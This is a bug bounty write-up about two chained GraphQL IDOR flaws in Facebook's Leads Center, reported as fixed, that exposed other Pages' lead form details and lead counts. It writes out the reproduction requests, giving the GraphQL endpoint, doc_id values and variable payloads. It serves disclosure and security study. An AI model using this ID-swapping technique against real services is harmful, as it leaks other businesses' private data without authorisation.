Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious user could have exposed the leads form details of any Facebook Page or Facebook Business Account.

Impact :

Advertisers spend a lot of time, energy and money optimizing their leads campaigns and doing countless A/B tests in order to get the right performing ad. By exposing the leads form details and the total number of leads captured through paid advertising, a malicious advertiser could have spy on a targeted Facebook Page or a competitor to “steal” and copy all the winning/profitable lead ads without investing a single dollar in advertising.

Description of Facebook Lead Ads

“Lots of people want to hear from your business, but filling in forms can be difficult on mobile. Facebook lead ads makes the lead generation process easy. People can simply tap your ad and a form pops up — it’s already pre-populated with their Facebook contact information and ready to be sent directly to you. With just a few taps, they can get the information they want, and you generate a qualified lead for your business” — Facebook.com

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“pageID”:”X”}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={“pageID”:”X”,”start_time”:null,”end_time”:null,”reminder_start_time”:1610481600,”reminder_end_time”:1610568000,”stage_id”:null,”owner_id”:null,”form_id”:”X”,”label_id”:null,”name_search_term”:null,”answer_search_term”:null,”email_search_term”:null,”notes_search_term”:null,”phone_search_term”:null,”adgroup_id”:null,”campaign_id”:null,”campaign_group_id”:null,”pageSize”:20,”expiring_type”:null,”is_unread”:false}&doc_id=3547538925278909

Where X is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.